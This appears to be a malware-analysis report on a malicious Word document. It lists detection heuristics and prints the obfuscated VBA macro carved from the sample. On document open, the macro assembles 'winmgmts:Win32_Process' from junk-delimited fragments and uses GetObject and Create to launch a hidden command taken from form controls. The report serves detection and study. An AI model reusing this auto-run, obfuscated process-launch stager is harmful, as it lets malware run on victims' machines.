MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Generic-7469262-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7469262-0
-
Malformed OLE auto-open stager with embedded ZIP payload critical OLE_RAW_MALFORMED_AUTOOPEN_STAGERRaw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set Zzbzojqu = GetObject(Boedaxyqtaag) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13063 bytes |
SHA-256: 4bc68be9c2fca5d56d9f715a70f7fab5a0ed833679ed8c1786794d7a14e97821 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
382 of 621 identifiers look randomly generated (e.g. 'hnkjKHK2222NNKLSess_') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Fwbejxmnpj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Vkzimturjeenc, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Igsepqmehcbg As Double
Dim Rdtprsexwwvk As Boolean
Ieoffsnrpvso = Jelhfrhtsx
Nlkwjelqvc = (Ahgaoxxcdsnsk)
Nnpmqzueb = 814
Dim Mocxrhqphxkh As String
Achvyrlwyxdg = "Vitae nemo."
Dim Wfcftvljagafc As Double
Dim Hdgkrpxnj As Boolean
Dim Hqpetkrstbu As Boolean
Jjrbbuspqpq = (329)
Dim Wzhystcfnutvm As String
Dim Jbemysahxvm As Double
Zqazkworku = Civpygpe
Dim Pldvevrkc As String
Dim Rfwuukpbw As Boolean
Dim Ulvkeszpx As Double
Sbovorsza = (Wlcyuevz)
Hirsauqzk = ("Voluptas dicta voluptas eveniet velit quia.")
Vlnvfywxjw = (Qpkhgxvtxhz)
Dim Xdnxbaqfubzp As Integer
Fzbtkiuacqm = Otlnmbbh
Hbxnnickfa
Dim Ypfkuntosohqg As Boolean
Dim Uuwuwqrisaix As Boolean
Smhocapyki = Yaxkzbgit
Vtihhnjlqpf = (Abeudvjo)
Rqlhbgrvqsv = 161
Dim Utilawyttzwk As Integer
Lexpcofqqvfif = "Et aut dolorem."
Dim Oifofkbvkjri As String
Dim Qoxcjgrscsxpd As Boolean
Dim Frrzaerrws As Double
Jnglglszhi = (175)
Dim Sbwfmqqhyiera As Double
Dim Uyxakwwhevhr As String
Dfxlugyhme = Flajplxr
Dim Khvawtrk As String
Dim Mwvdgffbvmmsu As Boolean
Dim Khvgwtmmcvp As Integer
Keqczgpjqxck = (Wlormmjlmveig)
Siqokrqwks = ("Annie")
Gujtvqwpandd = (Yruyraozxp)
Dim Vefpezyscrcb As Boolean
Jkifenkztzbm = Ehwuiausklj
End Sub
Attribute VB_Name = "Camxdyzasov"
Attribute VB_Base = "0{68A08007-2EAE-489F-919A-1C699FE87B53}{A0DE910C-662B-4B56-98C9-1ADFD1F10E64}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Zohvecnk"
Function Aqxdtbyhiyvx()
Dim Qgrtpykc As Double
Dim Whtrphlwlmia As String
Hjjrvjsswb = Fnlyuonnuoq
Ahnferqqilfo = (Maelslzcx)
Sunbottvwub = 609
Dim Skqzxbfjag As Integer
Qcydvyjbsl = "Soluta voluptatem sed accusantium dolorum est distinctio labore et maxime."
Dim Ptsmtwmk As Integer
Dim Tiuzewfdrnmp As Double
Dim Urbwrdugnnk As Integer
Tpeuprzjqi = (865)
Dim Nwotjqzvbrbv As Boolean
Dim Rxmvhoanlont As Integer
Yhejfcehfndxk = Bnjewzcwv
Dim Tzkafptcx As Integer
Dim Sqnokrzrkds As Boolean
Dim Aepzywkjix As String
Wfhndilmo = (Qipkxdqebraa)
Tdajeksd = ("Placeat voluptatibus natus.")
Mrdgugvvfly = (Mnfrtinveg)
Dim Ekcjlamzax As Boolean
Jjuwfupb = Ovysyvvthlqw
Usapwstupbld = Fwbejxmnpj.Vkzimturjeenc
Dim Jzerzexnxts As Double
Dim Vwkayxoxqsfp As Double
Sheqirwlow = Rxctseirazn
Uupshycsuegs = (Jyjioskfru)
Bgpjstivowhsh = 135
Dim Vxsvaquzt As Double
Ydlpduvhxvc = "At dolorem asperiores facere."
Dim Njhvmrrbrn As String
Dim Yywjhhwtb As String
Dim Kytmxzajt As Double
Iriymbyph = (207)
Dim Hfvyxqogrjsdw As String
Dim Eucrdvurqfai As Integer
Ummpnroqycjv = Xpnmbtxenqmbn
Dim Twhtlxxgo As Integer
Dim Fnwzhiiyt As Double
Dim Ohaxpzwdleal As Double
Cbayzjzdw = (Injdsotebi)
Ohxkkxbecrue = ("Clay")
Aurslkloh = (Atpghcxchm)
Dim Zogvjhqt As Integer
Lozmjwphaalxk = Yupwczujrs
Cinneipqscq = Usapwstupbld + Camxdyzasov.Ompxvrkfqlvl + Camxdyzasov.Ydootfwvx + Camxdyzasov.Oiuvdbgtedkjs
Dim Myfyslebmximg As Double
Dim Ntoytxjyf As Double
Ajldeoleezyh = Lttkiirwfw
Vozcaajxk = (Jsubcyhplpp)
Qnwgdeep = 659
Dim Tweczxyayqdjs As Boolean
Oxyghrfgv = "Garrett"
Dim Dcugqazvafx As Boolean
Dim Rmprqahvi As String
Dim Ggjcgnpjrlu As String
Racjwnbrb = (172)
Dim Ucopudsvcfz As Boolean
Dim Xpmpnewxqizq As String
Yuyxfquhezzpn = Uaspkmhbmdwtr
Dim Ozvgtbdhuuxq As String
Dim Pyrdxwigbol As String
Dim Muixdcklathz As Integer
Syvmwvnwefp = (Lhyhucirn)
Unacofkeafpig = ("Reiciendis cumque.")
Vfpqchjtzdc = (Wpyfmxsivl)
Dim Vktcvzrgfgdbx As Double
Ktaymsxikhk = Igathqgxq
Tuimwnybwuiad = Cinneipqscq + Camxdyzasov.Vwczvberfmi + Camxdyzasov.Vzexvfsf.Tag
Dim Gbdivtxmgctae As String
Dim Viztkmffor As Integer
Jxkjrrkc = Tggrbfwyuoabo
Qzkavprfto = (Scitebwotmslz)
Wcaiihaasab = 870
Dim Bbndljdvmu As Boolean
Snqdgzbm = "Voluptatibus placeat sit recusandae."
Dim Ctfhoscptdpm As String
Dim Zozqftjhehpt As Boolean
Dim Maazkgyuxeukt As Integer
Skfaxesa = (382)
Dim Flvpxrvif As Double
Dim Cqcgtfqvwvzm As Integer
Xksmstaqse = Famzboth
Dim Dudybfnlfyod As String
Dim Cwmjtmxxl As Integer
Dim Qixtlszv As Integer
Yiusvdhyw = (Zexebknd)
Inxlwpruf = ("Mathew")
Xadosryjp = (Bzqdapjilrf)
Dim Vwhynqerasb As Double
Qitpuhgtlyus = Kxcrrynt
Aqxdtbyhiyvx = Huwkeifnxlz + Tuimwnybwuiad + Huwkeifnxlz
Dim Lqhqdqnnmw As Double
Dim Lrfmazjavdbvd As Double
Jsphjyqtnxo = Pbsjxsyius
Eloholnkae = (Pqyuyrpljaluk)
Kthoziuenblzl = 789
Dim Jkgwuguek As Boolean
Vcezuxwn = "Natus error qui."
Dim Spuoumksnsd As Boolean
Dim Ranoxrpp As String
Dim Wnraohocyy As Double
Vmhaujlxlzl = (375)
Dim Zgizvmavfxb As Boolean
Dim Wlyqfloafb As Integer
Wgeazxcsmpafd = Ouqogxinay
Dim Zkmtfcbzgwvf As Double
Dim Jzgktndazgpnz As Boolean
Dim Secedciavuc As String
Eszknhoj = (Ehqykgescbl)
Taxwbylpqlzv = ("Sherman")
Ezrlempxw = (Xurcaarq)
Dim Jqlnkvznw As Integer
Dzaslpgb = Dkrdeunqkhega
End Function
Function Hbxnnickfa()
Dim Vxjwlmioireta As Integer
Dim Janznmnszrfw As Integer
Slliqtttpdbuj = Xqtdlcxpspmh
Egpyqqgtlk = (Pkjytdax)
Ltzvvvss = 637
Dim Njlxmvswod As Double
Zkmmfuvigh = "Quod repudiandae impedit cumque rem nesciunt aut dolores earum nihil."
Dim Uwzvvkbs As Double
Dim Nfzmlyldjywb As Boolean
Dim Iiqxwvegcic As Integer
Wbdcmdixgntix = (27)
Dim Xigscknm As Double
Dim Vjmgdqjv As Integer
Cfwkylrbvxo = Bitcjnljojxqt
Dim Cwjnvharmvu As String
Dim Lrwpwklykoah As Boolean
Dim Nvytepayz As Integer
Draqhgpw = (Xniuikssiifec)
Ncpbsmsiostkh = ("Aut.")
Llzhpiqyv = (Grfvzonut)
Dim Uylfetbpalpax As String
Uxnweuwlf = Stewmjem
iwoowjjjjj = "_&&*8992307&)hnkjKHK2222NNKLS"
Dim Strdkrihhdtsr As Boolean
Dim Pwtjpeip As Boolean
Nnzlumfvefs = Nynuptyznioe
Zkrjednxdiw = (Ownkjlcflck)
Orzfkgkwglmw = 285
Dim Gpueydck As Integer
Xftiknhh = "Dolorem aut quis repellendus soluta eum similique."
Dim Pwyyypcui As Boolean
Dim Oulvpqyl As Integer
Dim Eoyhemclseff As Double
Krwfjaicsa = (42)
Dim Imuxjwapkh As Double
Dim Tcaipfvjoaky As String
Cpkcvxxuepqu = Eqadremgzz
Dim Fzwibwcqtl As String
Dim Lctzylsvk As String
Dim Xzhhqfvpk As Integer
Sxywnurept = (Rpkniohrbsvy)
Pmkyvuscjvbb = ("Consequatur recusandae aut consectetur.")
Dgxklhqsfsmad = (Zczoufetq)
Dim Apfomhrjnvvk As Boolean
Dxhsluqs = Tbndsymgmu
Dlkabmfsqtd = Split("_&&*8992307&)hnkjKHK2222NNKLSwi_&&*8992307&)hnkjKHK2222NNKLSnm_&&*8992307&)hnkjKHK2222NNKLSgmt_&&*8992307&)hnkjKH" + "K2222NNKLSs:W_&&*8992307&)hnkjKHK2222NNKLSin_&&*8992307&)hnkjKHK2222NNKLS32_" + Fwbejxmnpj.Vkzimturjeenc + "_&&*8992307&)hnkjKHK2222NNKLSroc_&&*8992307&)hnkjKHK2222NNKLSess_&&*8992307&)hnkjKHK2222NNKLS", iwoowjjjjj)
Dim Gnxnoytv As Double
Dim Ptrukfrhugymv As Boolean
Sqaucabt = Jfbfvbrejaezi
Xlamdtrcj = (Sbpvnazyb)
Czegimvysik = 395
Dim Pbgocrdri As Boolean
Qonmezjof = "Adipisci animi et consectetur."
Dim Bhwlfgldzh As Double
Dim Gmulvjxyuk As Double
Dim Tyiusywjyfa As Integer
Rmwgfoaeehzj = (862)
Dim Ehioqlgshxq As Boolean
Dim Kdlamvte As Double
Sowwmori = Kscqrknlz
Dim Punpbtgnoujhg As Double
Dim Upudpoggqsauj As Double
Dim Iesccuigl As Integer
Vwjalwzrpy = (Pkjoxxazxlgme)
Nflijjft = ("Marshall")
Pheusmjrjcstg = (Kvnjpwvvsl)
Dim Phmjqzrh As Boolean
Eezwuvmluzaz = Sjuzulmjgit
Boedaxyqtaag = Join(Dlkabmfsqtd, "")
Dim Elajbrqm As String
Dim Pcazfkgsn As Boolean
Rzqbuulj = Pcsgiphzygeoy
Chdtnaovbmlji = (Eckjazhtwvyto)
Caucrnhqpwbhq = 553
Dim Gzrbbbeowyvng As String
Gztejkpfpjx = "Sed itaque fugit."
Dim Nzrqzapzcnav As String
Dim Xewzarbpbo As Double
Dim Lqtbrepkbx As Integer
Ogjoemtil = (728)
Dim Btkwutxxdepp As Integer
Dim Avvgokaxq As Boolean
Imlpvdymzshh = Qdaebyqkjerx
Dim Nredzblgmhhar As Double
Dim Msnnlxhaspmex As String
Dim Yyabyioei As Integer
Kqswahnlwl = (Rzgqlnmxnd)
Japerynfhb = ("Error sequi error.")
Iwpfqlhvuoi = (Rdrvjvhkinzr)
Dim Xxxcqnpioygh As String
Kouromzvwjyff = Jpogrjxwmsoci
Set Zzbzojqu = GetObject(Boedaxyqtaag)
Dim Yqsrrytyuc As Double
Dim Dfxhvtkapbju As Boolean
Sipkvrxtmslvl = Unvqmzke
Uwptxhyevflj = (Eujsfvzhm)
Nneawieopavh = 375
Dim Knrpsrldolr As Boolean
Zevnksyjttdz = "Rerum possimus aut corrupti dolorem minus est sit cumque et."
Dim Uuhjmjdui As Integer
Dim Tfjjztjgqfjt As Integer
Dim Pcgqtnqvkq As Boolean
Begoevnvq = (918)
Dim Zuauthckauy As Boolean
Dim Xdpubyvsa As Double
Ezbaofrucngw = Xohfjmcharbg
Dim Srvzcipufcwv As Boolean
Dim Utqhwadkn As Boolean
Dim Gpwzjyhmwbk As Integer
Ukddifjnj = (Gbujsqieji)
Tvvdpigcjbim = ("Roger")
Abhddxsksieyt = (Gizxrkinctfc)
Dim Fshwvphw As Boolean
Zajcmyqpa = Sjovmsof
Xardksvouy = Boedaxyqtaag + Camxdyzasov.Wgevisjhcgaq.ControlTipText + Camxdyzasov.Vtoybgiqkn.ControlTipText
Dim Jfpozmrurowod As Integer
Dim Zhbvslyj As Boolean
Kaxaancfpjnc = Ivexpezubkh
Gcmlwqvoltuq = (Johpxonnxgat)
Qzmtjuvccyrm = 378
Dim Wbkhokpftvkdf As String
Gkcvbymhb = "Unde unde et."
Dim Ygliykqnr As Integer
Dim Sfkekfrigpdxw As Boolean
Dim Qvajtiahljt As String
Zmrbjkrwlxogp = (976)
Dim Rvipvjtv As Boolean
Dim Cnrxyuquu As Integer
Xcomvsfxmdeq = Qaepofqetgw
Dim Ndxmvigttudzq As Double
Dim Aeywrhhtmegdd As String
Dim Hpvtruoqi As String
Wxgaqxrsepiz = (Gjkhpfcakmod)
Dlnppxkjnmoim = ("Distinctio.")
Typnblkejtc = (Mtmnauosbtklh)
Dim Ysgsrmrnypvlt As String
Vngoxuzb = Wwrffcupofrn
Txpandxatdsfg = Xardksvouy + Fwbejxmnpj.Vkzimturjeenc
Dim Fzkqyfsvm As String
Dim Clfqruzvkdjt As String
Osytmwsjpqxjt = Ymxwzvcrw
Uvkavgvrjmtb = (Btwpthbsnlqlx)
Lbcytcxy = 870
Dim Rnbwvfkxaycg As Boolean
Nrbhyjkj = "Quidem fuga vel tempore."
Dim Xlrcgueuhtc As String
Dim Vsgfowqa As Integer
Dim Ylcapaelhgmzj As String
Qfuhyibtr = (249)
Dim Rdvmqosnsre As String
Dim Udiunnwjsxx As Integer
Tgpwrluajapvq = Wvqmmgnvz
Dim Difyfyvuu As Boolean
Dim Wzsznkctzwpqn As Double
Dim Kepglqplh As Integer
Kuqzwevyyqtm = (Sfhjossa)
Qenzggolnsa = ("Itaque in eligendi.")
Zaluoyqq = (Eskhbtscjwcjr)
Dim Rscizzbkcijd As Double
Bixygjgw = Suqqlaqjuz
Set Hbxnnickfa = GetObject(Txpandxatdsfg)
Dim Flbuofiv As String
Dim Sopirdvezwe As Boolean
Wmuusdfj = Iawqmgldxto
Aydrrzrfwz = (Hulpsqhuy)
Unixntgmm = 437
Dim Twplnjgk As String
Lkflaofc = "Cesar"
Dim Ouqiejbemqn As Double
Dim Hbpzhdxnnvhi As Boolean
Dim Mnfajfwm As String
Ggehcyunn = (123)
Dim Kloyzjcayiacg As Boolean
Dim Hqdtwucitay As Double
Oauukecbqc = Umaxgeyslreju
Dim Hcuxatql As Double
Dim Frbnpqnsxbi As String
Dim Nwaxaxvkap As Integer
Zwejbeaciamx = (Bqqwtvgrhbawp)
Eecztqtj = ("Deserunt sit.")
Xizcmjdtevet = (Fniocjfolzev)
Dim Kfhhhbwngovsw As Double
Sxlahtfhfg = Jwayqzgizox
Hbxnnickfa.XSize = False
Dim Rksewfwzwlw As Double
Dim Fpowlxcbvsw As Integer
Tfnsrgwip = Wwsyckytcesrz
Ltmwswoplqmet = (Hpisapeez)
Dncbnohsucwt = 298
Dim Hhhhpgfcuwcjg As Boolean
Hpnkysbmjc = "Et aliquam."
Dim Avelwutsiwwje As Integer
Dim Tfzeivin As Double
Dim Ipggvxerje As Boolean
Lgpmtbksegk = (624)
Dim Gkyparhqd As Double
Dim Mlmzsrvjt As Integer
Tpvchdvecfoz = Gcinzziskah
Dim Amkayelrjt As String
Dim Evylzxmxlm As Double
Dim Wuemaeuvss As Boolean
Repudvwildud = (Lcuqzoyyd)
Yqezcrla = ("Inventore ipsum et aut facilis dolores debitis eveniet inventore.")
Uirtqpgbtzac = (Sacsgttblufe)
Dim Iljddnqucw As Boolean
Rwkfzwxkgbott = Twxolwws
Hbxnnickfa.YSize = False
Dim Buobsroo As Integer
Dim Cillxgelnajto As Double
Hxtpdijupwrqe = Bezpylscjrbxi
Ifbbluvzkrso = (Fpzmqyeuyoo)
Kxbkbounmpdn = 271
Dim Foyfwwndc As String
Rhpogmnwzl = "Jennifer"
Dim Grabbtawyn As Double
Dim Fzisrhgvyzjge As String
Dim Cpqcvdfso As Integer
Mjbgmdpqigdu = (366)
Dim Ehkhhuwboxgi As Integer
Dim Wahuwwvxtsmfq As Double
Yzumjrwukgby = Eaestuhzjyix
Dim Sucdikpxlvb As Boolean
Dim Fxnuxkbo As Double
Dim Mxtjzpwdm As Boolean
Cqeyqafgp = (Nucbveknfza)
Fpaqiospvrd = ("Hic ut error numquam.")
Vhkvicawjz = (Urtzejceotazo)
Dim Qasczvmi As Integer
Jrxltvpt = Xyqriacvcgk
Do While Zzbzojqu.Create(KSNNSN & Aqxdtbyhiyvx, Luibajxbmcnos, Hbxnnickfa, Ztyreebjmttx)
Loop
Dim Rivjlnqchpl As Integer
Dim Fgmtclejguki As Integer
Zhbzcvoabo = Gbrxodxxyw
Opvfknkapaq = (Qirdeeylq)
Rjghlyoc = 176
Dim Knzjpoegwf As String
Rxufutsrdyjsn = "Aliquam consectetur officia."
Dim Dpqmnctfv As Integer
Dim Oqteuzsvsimg As Double
Dim Kbimdgvphbrf As Boolean
Uysymaecxzdja = (995)
Dim Yqjlrdbkts As Double
Dim Zisnogvbtqnte As Boolean
Djitgdgik = Btsnzgbbftem
Dim Erphdqhc As Integer
Dim Bkyeutzieueci As Integer
Dim Grckoyxtqcmr As Double
Rmzxulohw = (Twhuybiiqw)
Rhyeqichc = ("Sit qui dolorum in voluptas iste.")
Nifeoucz = (Zucpzraeikkt)
Dim Qvhyztziu As Integer
Msxunnxdisnw = Qcdtoruayosn
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.